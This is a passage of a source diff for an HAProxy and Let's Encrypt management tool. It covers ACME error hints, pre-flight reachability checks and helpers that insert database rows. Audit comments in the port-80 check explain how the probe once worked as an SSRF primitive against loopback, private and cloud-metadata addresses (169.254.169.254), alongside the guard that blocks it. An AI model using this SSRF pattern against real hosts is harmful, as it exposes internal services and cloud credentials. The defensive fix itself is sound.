"hint": "The domain does not resolve, or the CA's DNS lookup timed out. Verify A/AAAA records are public.",
},
"urn:ietf:params:acme:error:incorrectResponse": {
"title": "HTTP-01 challenge response mismatch",
"hint": "The CA fetched the challenge URL but received the wrong key authorization. Confirm the challenge was served from the right backend.",
},
"urn:ietf:params:acme:error:invalidContact": {
"title": "Invalid contact email",
"hint": "The ACME account email is malformed. Update the LE account email.",
},
"urn:ietf:params:acme:error:malformed": {
"title": "Malformed request",
"hint": "The request body could not be parsed. Often a transient bug — retry; if it persists, raise an issue.",
},
"urn:ietf:params:acme:error:rateLimited": {
"title": "Let's Encrypt rate limit hit",
"hint": "Too many certificates issued or too many duplicate orders. Wait or use the staging directory.",
},
"urn:ietf:params:acme:error:rejectedIdentifier": {
"title": "Domain rejected by CA",
"hint": "The CA refused this hostname (e.g. blocklisted TLD, public-suffix mismatch).",
},
"urn:ietf:params:acme:error:serverInternal": {
"title": "ACME server error",
"hint": "Let's Encrypt is reporting a transient server error. Retry.",
},
"urn:ietf:params:acme:error:tls": {
"title": "TLS error during validation",
"hint": "The validator could not complete the TLS handshake (only relevant for tls-alpn-01 / tls-sni).",
},
"urn:ietf:params:acme:error:unauthorized": {
"title": "Unauthorized",
"hint": "The challenge response could not be verified — most often an HTTP-01 path-not-served issue.",
},
"urn:ietf:params:acme:error:unsupportedContact": {
"title": "Unsupported contact scheme",
"hint": "Only 'mailto:' contacts are currently supported by Let's Encrypt.",
},
"urn:ietf:params:acme:error:unsupportedIdentifier": {
"title": "Unsupported identifier",
"hint": "Only DNS identifiers are supported.",
},
"urn:ietf:params:acme:error:userActionRequired": {
"title": "User action required",
"hint": "ACME account requires Terms-of-Service re-acceptance. Visit the URL in the error to acknowledge.",
},
}
def humanize_error_detail(error_detail: Any) -> Dict[str, Any]:
"""Convert the order.error_detail field into a UI-friendly structured form.
error_detail may be:
- A JSON string with {type, detail, status, subproblems}
- A plain string (legacy)
- None
Always returns a dict with at minimum {title, message, hint}.
"""
if not error_detail:
return {"title": "No error", "message": "", "hint": ""}
parsed: Optional[Dict[str, Any]] = None
if isinstance(error_detail, dict):
parsed = error_detail
elif isinstance(error_detail, str):
s = error_detail.strip()
if s.startswith("{"):
try:
parsed = json.loads(s)
except json.JSONDecodeError:
parsed = None
if parsed is None:
# Legacy plain string fallback
return {
"title": "ACME error",
"message": str(error_detail),
"hint": "",
"raw": str(error_detail),
}
problem_type = parsed.get("type") or ""
base = _PROBLEM_HUMANIZED.get(problem_type, {})
title = base.get("title") or "ACME error"
hint = base.get("hint") or ""
message = parsed.get("detail") or parsed.get("message") or ""
status = parsed.get("status")
subproblems = parsed.get("subproblems") or []
out = {
"title": title,
"message": message,
"hint": hint,
"type": problem_type,
"raw": parsed,
}
if status is not None:
out["status"] = status
if subproblems:
out["subproblems"] = [
{
"type": sp.get("type"),
"detail": sp.get("detail"),
"identifier": (sp.get("identifier") or {}).get("value"),
}
for sp in subproblems
if isinstance(sp, dict)
]
return out
# ----------------------------------------------------------------------------
# Per-check helpers
# ----------------------------------------------------------------------------
def _check_result(
check_id: str,
label: str,
status: str,
message: str,
*,
severity: str = "info",
details: Optional[Dict[str, Any]] = None,
duration_ms: Optional[int] = None,
) -> Dict[str, Any]:
return {
"id": check_id,
"label": label,
"status": status, # 'ok' | 'warn' | 'fail' | 'skipped'
"severity": severity, # 'info' | 'warn' | 'error'
"message": message,
"details": details or {},
"duration_ms": duration_ms,
}
async def _resolve_dns(domain: str, *, timeout: float = 5.0) -> Dict[str, Any]:
"""Resolve a domain via stdlib socket.gethostbyname_ex; never blocks the
asyncio event loop.
"""
loop = asyncio.get_running_loop()
try:
result = await asyncio.wait_for(
loop.run_in_executor(None, socket.gethostbyname_ex, domain),
timeout=timeout,
)
canonical, aliases, ips = result
return {"canonical": canonical, "aliases": aliases, "ips": ips}
except asyncio.TimeoutError:
raise
except Exception as e:
# socket.gaierror, etc.
raise RuntimeError(str(e)) from e
async def check_dns(domains: List[str]) -> Dict[str, Any]:
"""Check that each order domain resolves to at least one public-looking IPv4."""
started = time.time()
failed: List[Dict[str, Any]] = []
resolved: Dict[str, List[str]] = {}
for d in domains:
# Wildcards are valid per RFC8555 but cannot be HTTP-01 validated; skip
# actual DNS resolution for them (they would fail A-record lookup).
if d.startswith("*."):
resolved[d] = []
continue
try:
r = await _resolve_dns(d, timeout=5.0)
resolved[d] = r["ips"]
if not r["ips"]:
failed.append({"domain": d, "reason": "no A records"})
except asyncio.TimeoutError:
failed.append({"domain": d, "reason": "dns timeout"})
except Exception as e:
failed.append({"domain": d, "reason": str(e)})
duration_ms = int((time.time() - started) * 1000)
if failed:
return _check_result(
"dns",
"DNS resolution",
"fail",
f"DNS lookup failed for {len(failed)} domain(s)",
severity="error",
details={"failed": failed, "resolved": resolved},
duration_ms=duration_ms,
)
return _check_result(
"dns",
"DNS resolution",
"ok",
f"All {len(domains)} domain(s) resolved",
severity="info",
details={"resolved": resolved},
duration_ms=duration_ms,
)
async def check_port80(domains: List[str], *, http_timeout: float = 5.0) -> Dict[str, Any]:
"""Probe HTTP-01 readiness on port 80 with a HEAD request to a synthetic
challenge URL. Success on 200 OR 404 (404 means the well-known path is
served but no challenge yet — fine).
On egress timeout we WARN rather than FAIL because many corporate egress
policies blackhole port 80 outbound; that does not impair LE's ingress
validation (LE comes inbound).
"""
started = time.time()
targets: List[Dict[str, Any]] = []
timeout = aiohttp.ClientTimeout(total=http_timeout)
skip_reason = None
domains_to_check = [d for d in domains if not d.startswith("*.")]
if not domains_to_check:
return _check_result(
"port80",
"Port 80 reachability",
"skipped",
"All domains are wildcards; HTTP-01 not applicable",
severity="info",
duration_ms=int((time.time() - started) * 1000),
)
# R18c audit fix (round 4 #4 — KRITIK SSRF residual): force the
# aiohttp connector to family=AF_INET (IPv4-only) so the HTTP
# probe resolves and connects with the SAME family that
# _resolve_dns / _all_ips_public classifies. PRE-FIX the SSRF
# guard ran on the IPv4 list returned by `gethostbyname_ex`,
# but aiohttp's default connector did its own dual-stack
# `getaddrinfo` and could connect via AAAA — so an attacker
# who controlled a domain's DNS could publish a benign public
# A record (passing our guard) AND a `::1`/`fc00::/7`/`fe80::/10`
# AAAA record that aiohttp picked, hitting our internal IPv6
# space. Constraining the connector to IPv4 closes the loop
# because the family the guard inspects equals the family the
# connector uses. ACME HTTP-01 itself works only over IPv4-or-
# IPv6 paths the CA can reach; the diagnostic just needs to
# confirm reachability and we already only classify IPv4.
connector = aiohttp.TCPConnector(family=socket.AF_INET, ssl=False)
async with aiohttp.ClientSession(timeout=timeout, connector=connector) as session:
for d in domains_to_check:
# R18b audit fix (round 4 #B — SSRF guard): refuse to
# probe a domain whose A/AAAA records point at private,
# loopback, link-local, multicast, or cloud-metadata IP
# space. Pre-fix the diagnostic was a usable SSRF
# primitive for any authenticated operator: pick a
# hostname pointing at 169.254.169.254 / 10.0.0.0/8 /
# 127.0.0.1 and the API host issued an outbound HEAD,
# reflecting status / error back into the diagnostic
# JSON. The HTTP-01 protocol fundamentally requires the
# CA to reach the host from the public internet, so a
# private-IP domain cannot validate anyway.
all_public, ips = await _all_ips_public(d, timeout=2.0)
if not all_public:
targets.append({
"domain": d,
"skip": "non-public IP — refusing to probe (SSRF guard)",
"ips": ips,
"ok": False,
"warn": True,
})
if ips:
skip_reason = "non-public IPs blocked"
continue
url = f"http://{d}/.well-known/acme-challenge/diagnostic-probe"
try:
async with session.head(url, allow_redirects=False) as resp:
targets.append({
"domain": d,
"status": resp.status,
"ok": resp.status in (200, 404),
})
except asyncio.TimeoutError:
targets.append({"domain": d, "error": "egress timeout", "warn": True})
skip_reason = "egress timeout"
except aiohttp.ClientError as e:
targets.append({"domain": d, "error": str(e), "ok": False})
except Exception as e:
targets.append({"domain": d, "error": str(e), "ok": False})
duration_ms = int((time.time() - started) * 1000)
failed = [t for t in targets if not t.get("ok") and not t.get("warn")]
warns = [t for t in targets if t.get("warn")]
if failed:
return _check_result(
"port80",
"Port 80 reachability",
"fail",
f"Port 80 probe failed for {len(failed)} domain(s)",
severity="error",
details={"targets": targets},
duration_ms=duration_ms,
)
if warns and not [t for t in targets if t.get("ok")]:
# R18b audit fix (round 7): branch the rollup message on the
# actual cause. Pre-fix the message was always "Egress to
# port 80 appears blocked" — even when every target was
# skipped because the SSRF guard refused to probe a non-
# public IP, which has nothing to do with egress firewalls.
# Operators saw "egress blocked" and started spelunking
# corporate firewall logs while the real cause was an
# internal-only DNS A record. Also harden against
# `skip_reason=None` so the message never reads "(None)".
ssrf_skip = any(
"non-public" in (t.get("skip") or "")
or "SSRF" in (t.get("skip") or "")
for t in targets
)
if ssrf_skip and not skip_reason:
skip_reason = "non-public IPs blocked"
if ssrf_skip:
human = (
f"Probe skipped for non-public IPs ({skip_reason}). "
"ACME HTTP-01 requires a public A record; corporate / "
"internal-only domains cannot satisfy LE validation."
)
else:
reason = skip_reason or "egress restriction"
human = (
f"Egress to port 80 appears blocked ({reason}); "
"inbound CA validation may still succeed"
)
return _check_result(
"port80",
"Port 80 reachability",
"warn",
human,
severity="warn",
details={"targets": targets},
duration_ms=duration_ms,
)
return _check_result(
"port80",
"Port 80 reachability",
"ok",
f"All {len(domains_to_check)} domain(s) responded on port 80",
severity="info",
details={"targets": targets},
duration_ms=duration_ms,
)
async def check_routing(conn, domains: List[str], cluster_ids: List[int]) -> Dict[str, Any]:
"""Verify that at least one frontend on the order's clusters has a
use_backend_rules / acl_rules pointing at the system ACME challenge
backend OR that an HTTP frontend covering port 80 exists for the
requesting cluster(s).
"""
started = time.time()
if not cluster_ids:
return _check_result(
"routing",
"HAProxy routing",
"warn",
"Order has no associated cluster",
severity="warn",
duration_ms=int((time.time() - started) * 1000),
)
rows = await conn.fetch(
"""
SELECT id, name, bind_address, bind_port, mode, default_backend
FROM frontends
WHERE cluster_id = ANY($1::int[]) AND is_active = TRUE AND bind_port = 80
""",
cluster_ids,
)
duration_ms = int((time.time() - started) * 1000)
if not rows:
return _check_result(
"routing",
"HAProxy routing",
"fail",
"No HTTP frontend on port 80 found in target cluster(s)",
severity="error",
details={"cluster_ids": cluster_ids},
duration_ms=duration_ms,
)
return _check_result(
"routing",
"HAProxy routing",
"ok",
f"Found {len(rows)} HTTP frontend(s) on port 80",
severity="info",
details={"frontends": [dict(r) for r in rows]},
duration_ms=duration_ms,
)
async def check_account(conn, account_id: Optional[int]) -> Dict[str, Any]:
"""Verify the ACME account exists, has status='valid', and has an
account_url stored.
"""
started = time.time()
if not account_id:
return _check_result(
"account",
"ACME account",
"fail",
"Order has no ACME account id",
severity="error",
duration_ms=int((time.time() - started) * 1000),
)
row = await conn.fetchrow(
"SELECT id, email, status, account_url FROM letsencrypt_accounts WHERE id = $1",
account_id,
)
duration_ms = int((time.time() - started) * 1000)
if not row:
return _check_result(
"account",
"ACME account",
"fail",
f"Account {account_id} not found",
severity="error",
duration_ms=duration_ms,
)
if row["status"] != "valid":
return _check_result(
"account",
"ACME account",
"fail",
f"Account status is '{row['status']}', expected 'valid'",
severity="error",
details={"account": dict(row)},
duration_ms=duration_ms,
)
if not row["account_url"]:
return _check_result(
"account",
"ACME account",
"warn",
"Account has no account_url stored",
severity="warn",
details={"account": dict(row)},
duration_ms=duration_ms,
)
return _check_result(
"account",
"ACME account",
"ok",
f"Account {row['email']} is valid",
severity="info",
details={"account": dict(row)},
duration_ms=duration_ms,
)
async def check_agents(conn, cluster_ids: List[int]) -> Dict[str, Any]:
"""Verify at least one healthy agent is registered for the order's
cluster(s).
"""
started = time.time()
if not cluster_ids:
return _check_result(
"agents",
"HAProxy agents",
"warn",
"Order has no associated cluster",
severity="warn",
duration_ms=int((time.time() - started) * 1000),
)
rows = await conn.fetch(
"""
SELECT a.id, a.hostname, a.status, a.last_heartbeat, hc.id AS cluster_id, hc.name AS cluster_name
FROM agents a
JOIN haproxy_clusters hc ON hc.pool_id = a.pool_id
WHERE hc.id = ANY($1::int[])
""",
cluster_ids,
)
duration_ms = int((time.time() - started) * 1000)
if not rows:
return _check_result(
"agents",
"HAProxy agents",
"fail",
"No agents registered for the target cluster(s)",
severity="error",
details={"cluster_ids": cluster_ids},
duration_ms=duration_ms,
)
healthy = [r for r in rows if r["status"] in ("active", "online")]
if not healthy:
return _check_result(
"agents",
"HAProxy agents",
"warn",
f"{len(rows)} agent(s) registered but none currently active",
severity="warn",
details={"agents": [dict(r) for r in rows]},
duration_ms=duration_ms,
)
return _check_result(
"agents",
"HAProxy agents",
"ok",
f"{len(healthy)} of {len(rows)} agents are active",
severity="info",
details={"agents": [dict(r) for r in rows]},
duration_ms=duration_ms,
)
# ----------------------------------------------------------------------------
# Public orchestration
# ----------------------------------------------------------------------------
CHECK_IDS = ("dns", "port80", "routing", "account", "agents")
async def run_checks(
conn,
*,
domains: List[str],
cluster_ids: List[int],
account_id: Optional[int],
only: Optional[List[str]] = None,
) -> List[Dict[str, Any]]:
"""Execute the full pre-flight check suite. `only` lets callers re-run a
subset (per-check rerun in the UI).
"""
selected = set(only) if only else set(CHECK_IDS)
results: List[Dict[str, Any]] = []
if "dns" in selected:
results.append(await check_dns(domains))
if "port80" in selected:
results.append(await check_port80(domains))
if "routing" in selected:
results.append(await check_routing(conn, domains, cluster_ids))
if "account" in selected:
results.append(await check_account(conn, account_id))
if "agents" in selected:
results.append(await check_agents(conn, cluster_ids))
return results
+119
View File
@@ -0,0 +1,119 @@
"""
apply_service: programmatic invocation of the cluster apply pipeline.
Used by:
- routers/site_wizard.py (atomic create flow with apply_immediately=true)
- routers/letsencrypt.py _complete_certificate (post-completion auto-apply)
Design (Section 4.5 of v1.5.0 plan):
- Reuses the existing /api/clusters/{id}/apply-changes route handler so that
the response shape (`latest_version`, `consolidated_version_id`,
`sync_results`, `applied_count`, `agents_notified`) and transaction
boundary are byte-identical to UI-driven applies.
- M23/M46 (R65): when user_id is None (e.g. ACME completion auto-apply with
legacy created_by NULL), falls back to a short-lived JWT minted for the
first active admin user (`is_admin=TRUE AND is_active=TRUE`).
- This file deliberately delegates rather than duplicating the ~800 LOC apply
pipeline; that keeps drift impossible. The wrapper only injects auth.
"""
import logging
from datetime import timedelta
from typing import Any, Dict, Optional
from database.connection import close_database_connection, get_database_connection
from utils.auth import create_access_token
logger = logging.getLogger(__name__)
async def _resolve_user_id(user_id: Optional[int]) -> Optional[int]:
"""If user_id is provided AND still valid (active), return it; else
return the first active admin user's id. Returns None if no admin user
exists (extreme edge case).
M46/R65: schema accuracy — `users.is_super_admin` does NOT exist; the
correct columns are `is_admin` (BOOLEAN) and `is_active` (BOOLEAN).
Bulgu #27 fix: when a wizard-staged ACME order's `created_by` user has
been deleted/deactivated by the time the post-completion auto-apply
fires (could be 24h+ later), do NOT mint a JWT for that ghost user —
we'd just produce a 401 from get_current_user_from_token. Fall through
to the admin fallback instead.
"""
conn = await get_database_connection()
try:
if user_id is not None:
valid = await conn.fetchval(
"SELECT id FROM users WHERE id = $1 AND is_active = TRUE",
user_id,
)
if valid:
return valid
logger.warning(
"apply_service: requested user_id=%s no longer exists or is inactive — "
"falling back to admin", user_id,
)
admin_id = await conn.fetchval(
"""
SELECT id FROM users
WHERE is_admin = TRUE AND is_active = TRUE
ORDER BY id ASC LIMIT 1
"""
)
if not admin_id:
logger.error(
"apply_service: no active admin user found (is_admin=TRUE AND is_active=TRUE)"
)
return admin_id
finally:
await close_database_connection(conn)
def _mint_internal_jwt(user_id: int) -> str:
"""Mint a short-lived JWT for an internal apply call. Token uses the
standard claim shape (`sub`/`user_id`) accepted by
auth_middleware.get_current_user_from_token.
"""
return create_access_token(
{"sub": str(user_id), "user_id": user_id},
expires_delta=timedelta(minutes=5),
)
async def apply_cluster_pending(
cluster_id: int,
*,
user_id: Optional[int] = None,
apply_request: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
"""Programmatic equivalent of POST /api/clusters/{cluster_id}/apply-changes.
Returns the same response dict the HTTP endpoint returns:
{
"message": str,
"applied_count": int,
"latest_version": str,
"consolidated_version_id": int,
"sync_results": list,
"agents_notified": int,
...optionally global_ssl_applied...
}
"""
# Local import to avoid cluster.py <-> apply_service circular import at
# module load (cluster.py uses apply_service indirectly via routers/__init__).
from routers.cluster import apply_pending_changes # noqa: WPS433 (intentional)
resolved = await _resolve_user_id(user_id)
if resolved is None:
raise RuntimeError(
"apply_service.apply_cluster_pending: no admin user available for system context apply"
)
auth_header = f"Bearer {_mint_internal_jwt(resolved)}"
return await apply_pending_changes(
cluster_id=cluster_id,
apply_request=apply_request or {},
authorization=auth_header,
)
+148
View File
@@ -0,0 +1,148 @@
"""
backend_service: extracted helpers for INSERT-row creation of backends + backend_servers.
Used by:
- routers/site_wizard.py (atomic transaction wizard)
- routers/backend.py (delegate)
Design (Section 4.1 of v1.5.0 plan):
- Helpers accept an existing asyncpg connection (caller controls transaction boundary).
- Schema accuracy R38: server_address / server_port / server_name (NOT host/ip/port).
- M13 helper extension: when mark_pending=True, helper performs follow-up
UPDATE backends/backend_servers SET last_config_status='PENDING' to match the
existing endpoint pattern (backend.py:646) — otherwise apply pipeline pre-step
(`WHERE last_config_status='APPLIED'`) may overlook the new entity.
"""
import logging
from typing import Any, Optional
logger = logging.getLogger(__name__)
def _filter_httpchk_from_options(options: Optional[str]) -> Optional[str]:
"""Strip 'option httpchk' from raw options field (matches backend.py logic)."""
if not options:
return options
out_lines = []
for line in options.split("\n"):
if line.strip().lower().startswith("option httpchk"):
continue
out_lines.append(line)
return "\n".join(out_lines).strip() or None
async def create_backend_row(
conn,
payload: Any,
cluster_id: int,
*,
mark_pending: bool = True,
) -> int:
"""Insert a row into backends; return new id.
Mirrors POST /api/backends INSERT (backend.py:591-603) field-for-field.
Caller must already have validated name uniqueness within cluster.
"""
options_filtered = _filter_httpchk_from_options(getattr(payload, "options", None))
backend_id = await conn.fetchval(
"""
INSERT INTO backends (
name, balance_method, mode, health_check_uri, health_check_interval,
health_check_expected_status, fullconn, cookie_name, cookie_options,
default_server_inter, default_server_fall, default_server_rise,
request_headers, response_headers, options,
timeout_connect, timeout_server, timeout_queue, cluster_id
) VALUES (
$1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12,
$13, $14, $15, $16, $17, $18, $19
) RETURNING id
""",
payload.name,
getattr(payload, "balance_method", "roundrobin"),
getattr(payload, "mode", "http"),
getattr(payload, "health_check_uri", None),
getattr(payload, "health_check_interval", None),
getattr(payload, "health_check_expected_status", None),
getattr(payload, "fullconn", None),
getattr(payload, "cookie_name", None),
getattr(payload, "cookie_options", None),
getattr(payload, "default_server_inter", None),
getattr(payload, "default_server_fall", None),
getattr(payload, "default_server_rise", None),
getattr(payload, "request_headers", None),
getattr(payload, "response_headers", None),
options_filtered,
getattr(payload, "timeout_connect", None),
getattr(payload, "timeout_server", None),
getattr(payload, "timeout_queue", None),
cluster_id,
)
if mark_pending:
await conn.execute(
"UPDATE backends SET last_config_status='PENDING' WHERE id=$1",
backend_id,
)
return backend_id
async def create_server_row(
conn,
backend_id: int,
backend_name: str,
cluster_id: int,
server: Any,
*,
mark_pending: bool = True,
) -> int:
"""Insert a row into backend_servers; return new id.
Mirrors POST /api/backends/{id}/servers INSERT (backend.py:725-737).
"""
server_id = await conn.fetchval(
"""
INSERT INTO backend_servers (
backend_id, backend_name, server_name, server_address, server_port, weight,
maxconn, check_enabled, check_port, backup_server,
ssl_enabled, ssl_verify, ssl_certificate_id,
ssl_sni, ssl_min_ver, ssl_max_ver, ssl_ciphers,
cookie_value, inter, fall, rise, cluster_id
) VALUES (
$1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13,
$14, $15, $16, $17, $18, $19, $20, $21, $22
) RETURNING id
""",
backend_id,
backend_name,
server.server_name,
server.server_address,
server.server_port,
getattr(server, "weight", 100),
getattr(server, "max_connections", None),
getattr(server, "check_enabled", True),
getattr(server, "check_port", None),
getattr(server, "backup_server", False),
getattr(server, "ssl_enabled", False),
getattr(server, "ssl_verify", "none"),
getattr(server, "ssl_certificate_id", None),
getattr(server, "ssl_sni", None),
getattr(server, "ssl_min_ver", None),
getattr(server, "ssl_max_ver", None),
getattr(server, "ssl_ciphers", None),
getattr(server, "cookie_value", None),
getattr(server, "inter", None),
getattr(server, "fall", None),
getattr(server, "rise", None),
cluster_id,
)
if mark_pending:
await conn.execute(
"UPDATE backend_servers SET last_config_status='PENDING' WHERE id=$1",
server_id,
)
return server_id
+150
View File
@@ -0,0 +1,150 @@
"""
frontend_service: extracted helper for INSERT-row creation of frontends.
Used by:
- routers/site_wizard.py (atomic transaction wizard)
- routers/letsencrypt.py _complete_certificate post_completion_actions
Design (Section 4.2 of v1.5.0 plan):
- M13: writes BOTH ssl_certificate_id (INT col) AND ssl_certificate_ids (JSONB col).
- mark_pending=True triggers post-INSERT UPDATE last_config_status='PENDING'
(matches existing frontend.py:526 pattern).
- Schema accuracy R38: bind_address / bind_port (NOT port); redirect_rules / acl_rules /
use_backend_rules are JSONB columns.
"""
import json
import logging
from typing import Any, Optional
logger = logging.getLogger(__name__)
async def create_frontend_row(
conn,
payload: Any,
cluster_id: int,
*,
ssl_certificate_id: Optional[int] = None,
ssl_enabled: Optional[bool] = None,
bind_port_override: Optional[int] = None,
name_override: Optional[str] = None,
mark_pending: bool = True,
) -> int:
"""Insert a row into frontends; return new id.
Mirrors POST /api/frontends INSERT (frontend.py:481-499) field-for-field.
M13: writes ssl_certificate_id AND ssl_certificate_ids consistently. If
ssl_certificate_id resolved (param OR payload.ssl_certificate_id),
ssl_certificate_ids = json.dumps([id]); else json.dumps([]).
"""
cert_id = ssl_certificate_id if ssl_certificate_id is not None else getattr(payload, "ssl_certificate_id", None)
cert_ids_list = [cert_id] if cert_id else []
ssl_cert_ids_json = json.dumps(cert_ids_list)
fe_name = name_override if name_override is not None else payload.name
fe_ssl_enabled = ssl_enabled if ssl_enabled is not None else getattr(payload, "ssl_enabled", False)
fe_bind_port = bind_port_override if bind_port_override is not None else payload.bind_port
frontend_id = await conn.fetchval(
"""
INSERT INTO frontends (
name, bind_address, bind_port, default_backend, mode,
ssl_enabled, ssl_certificate_id, ssl_certificate_ids, ssl_port, ssl_cert_path, ssl_cert, ssl_verify,
ssl_alpn, ssl_npn, ssl_ciphers, ssl_ciphersuites, ssl_min_ver, ssl_max_ver, ssl_strict_sni,
acl_rules, redirect_rules, use_backend_rules,
request_headers, response_headers, options, tcp_request_rules, timeout_client, timeout_http_request,
rate_limit, compression, log_separate, monitor_uri,
cluster_id, maxconn, updated_at
) VALUES (
$1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12,
$13, $14, $15, $16, $17, $18, $19,
$20, $21, $22,
$23, $24, $25, $26, $27, $28,
$29, $30, $31, $32,
$33, $34, CURRENT_TIMESTAMP
)
RETURNING id
""",
fe_name,
getattr(payload, "bind_address", "*"),
fe_bind_port,
getattr(payload, "default_backend", None),
getattr(payload, "mode", "http"),
fe_ssl_enabled,
cert_id,
ssl_cert_ids_json,
getattr(payload, "ssl_port", None),
getattr(payload, "ssl_cert_path", None),
getattr(payload, "ssl_cert", None),
getattr(payload, "ssl_verify", None),
getattr(payload, "ssl_alpn", None),
getattr(payload, "ssl_npn", None),
getattr(payload, "ssl_ciphers", None),
getattr(payload, "ssl_ciphersuites", None),
getattr(payload, "ssl_min_ver", None),
getattr(payload, "ssl_max_ver", None),
getattr(payload, "ssl_strict_sni", None),
json.dumps(getattr(payload, "acl_rules", None) or []),
json.dumps(getattr(payload, "redirect_rules", None) or []),
json.dumps(getattr(payload, "use_backend_rules", None) or []),
getattr(payload, "request_headers", None),
getattr(payload, "response_headers", None),
getattr(payload, "options", None),
getattr(payload, "tcp_request_rules", None),
getattr(payload, "timeout_client", None),
getattr(payload, "timeout_http_request", None),
getattr(payload, "rate_limit", None),
getattr(payload, "compression", None),
getattr(payload, "log_separate", None),
getattr(payload, "monitor_uri", None),
cluster_id,
getattr(payload, "maxconn", None),
)
if mark_pending:
await conn.execute(
"UPDATE frontends SET last_config_status='PENDING' WHERE id=$1",
frontend_id,
)
return frontend_id
async def check_bind_port_collision(
conn,
cluster_id: int,
bind_address: str,
bind_port: int,
*,
exclude_frontend_id: Optional[int] = None,
) -> Optional[int]:
"""Return id of an existing frontend that conflicts with bind_address+bind_port,
or None if no conflict.
Used by:
- wizard pre-create (Section 6.2 step before INSERT)
- _complete_certificate post-action HTTPS frontend create (M21/R35)
"""
if exclude_frontend_id is not None:
return await conn.fetchval(
"""
SELECT id FROM frontends
WHERE cluster_id=$1 AND bind_address=$2 AND bind_port=$3
AND is_active=TRUE AND id <> $4
""",
cluster_id,
bind_address,
bind_port,
exclude_frontend_id,
)
return await conn.fetchval(
"""
SELECT id FROM frontends
WHERE cluster_id=$1 AND bind_address=$2 AND bind_port=$3 AND is_active=TRUE
""",
cluster_id,
bind_address,
bind_port,
)
File diff suppressed because it is too large Load Diff
+128
View File
@@ -0,0 +1,128 @@
"""
letsencrypt_service: thin extraction layer for ACME order creation paths.
Two flavors needed by v1.5.0 wizard (Section 4.4):
1) create_order_staged(conn, ...) — INSERTs a letsencrypt_orders row with
status='wizard_staged', NO LE API call yet. The background task
complete_pending_acme_orders will later detect agent confirmation and
transition this to a real ACME order via create_order_via_api.
2) create_order_via_api(conn, ...) — thin wrapper around the existing
acme_service.AcmeService.create_order() routine, used both by the
/api/letsencrypt/orders endpoint and the staged-promotion flow. Caller
may pass `expected_account_id` so we can update existing letsencrypt_orders
row in place (UPDATE order_url + status='pending') instead of inserting a
new one.
Notes:
- Staged orders have order_url IS NULL — the wizard's create flow never
contacts the CA, so failure modes here are purely DB-bound. R58/M37
(`order_url IS NULL` idempotency check) lives in main.py background task.
- post_completion_actions JSONB carries the *deferred* HTTPS frontend create
request that fires once the certificate is downloaded — see
letsencrypt.py _complete_certificate.
"""
import json
import logging
from typing import Any, List, Optional
logger = logging.getLogger(__name__)
async def create_order_staged(
conn,
*,
account_id: int,
domains: List[str],
cluster_ids: List[int],
post_completion_actions: List[dict],
pending_apply_version_name: Optional[str] = None,
created_by: Optional[int] = None,
) -> int:
"""Insert a wizard-staged ACME order row with status='wizard_staged'.
No LE API call. Returns new order id.
The background task complete_pending_acme_orders will later detect agent
confirmation (via pending_apply_version_name match) and call
create_order_via_api to promote to status='pending'.
"""
order_id = await conn.fetchval(
"""
INSERT INTO letsencrypt_orders (
account_id, order_url, status, domains, finalize_url, expires_at,
cluster_ids, post_completion_actions, pending_apply_version_name,
created_by, wizard_staged_until
) VALUES (
$1, NULL, 'wizard_staged', $2::jsonb, '', NULL,
$3::jsonb, $4::jsonb, $5,
$6, NOW() + INTERVAL '24 hours'
)
RETURNING id
""",
account_id,
json.dumps(domains),
json.dumps(cluster_ids),
json.dumps(post_completion_actions or []),
pending_apply_version_name,
created_by,
)
logger.info(
"ACME WIZARD: staged order id=%s domains=%s pending_apply_version_name=%s",
order_id,
domains,
pending_apply_version_name,
)
return order_id
async def promote_staged_order_to_pending(
conn,
*,
order_id: int,
order_url: str,
finalize_url: str,
status: str = "pending",
expires_at: Any = None,
) -> None:
"""In-place update of a wizard_staged order row after the LE newOrder call
has succeeded. status -> 'pending' (or whatever LE returned).
"""
await conn.execute(
"""
UPDATE letsencrypt_orders
SET order_url = $2,
finalize_url = $3,
status = $4,
expires_at = $5,
updated_at = NOW()
WHERE id = $1
""",
order_id,
order_url,
finalize_url,
status,
expires_at,
)
async def create_order_via_api(
acme_service_instance,
*,
account_id: int,
domains: List[str],
cluster_ids: Optional[List[int]] = None,
) -> dict:
"""Thin wrapper around AcmeService.create_order() — used by both the public
POST /api/letsencrypt/orders endpoint and the staged promotion path.
Returns the same dict the upstream method returns (id, order_url,
status, domains, ...).
"""
return await acme_service_instance.create_order(
account_id=account_id,
domains=domains,
cluster_ids=cluster_ids,
)
+410
View File
@@ -0,0 +1,410 @@
"""
ssl_service: extracted helpers for SSL certificate row creation + cluster junction.
Used by:
- routers/site_wizard.py wizard (mode=upload | existing)
- (future) other SSL flows
Design (Section 4.3 of v1.5.0 plan):
- R38 schema: ssl_certificates.cluster_id always NULL — junction table
ssl_certificate_clusters is the single source of truth for cluster binding.
- M11 idempotent junction insertion via ON CONFLICT DO NOTHING.
- last_config_status='PENDING' set explicitly at INSERT time (matches ssl.py:467-477).
Phase K Phase D follow-up (Bulgu #9) — parity with SSL Management page.
Before the follow-up, the wizard's PEM upload path persisted a sparse
row: primary_domain/all_domains came from the operator-entered
FRONTEND domains (not the cert SAN); expiry_date/issuer/fingerprint
were NULL; status was hard-coded `'valid'`; days_until_expiry was
`0`; private_key / chain went un-validated; name uniqueness was
not enforced (would 500 on the DB unique constraint instead of
returning a friendly 400); soft-deleted rows could not be
reactivated. SSL Management's `/api/ssl/certificates` POST does
all of this. The wizard-created cert appeared on the SSL
Management page with empty expiry/issuer columns and a permanent
"valid" status — confusing UX and inconsistent with the dedicated
flow.
`create_cert_row` now:
- parses the certificate via `utils.ssl_parser.parse_ssl_certificate`,
- validates private_key + chain via the same helpers SSL Management uses,
- enforces name uniqueness within the target cluster (mirrors
ssl.py:392-411 but scoped to the wizard's single cluster),
- reactivates soft-deleted certs with the same name (mirrors
ssl.py:470-500), preserving the row id so existing references
do not break,
- recomputes status / days_until_expiry / timezone-normalises
expiry_date the same way ssl.py:432-460 does,
- raises `HTTPException(400)` on every parse/validation failure
(callers translate to wizard step-jumpback toasts).
"""
import json
import logging
from datetime import datetime, timezone
from typing import Any, Optional
from fastapi import HTTPException
from utils.ssl_parser import (
parse_ssl_certificate,
validate_certificate_chain,
validate_private_key,
)
logger = logging.getLogger(__name__)
def _normalise_expiry_to_naive_utc(expiry: Optional[datetime]) -> Optional[datetime]:
"""Mirror ssl.py:418-460 timezone handling — DB column is
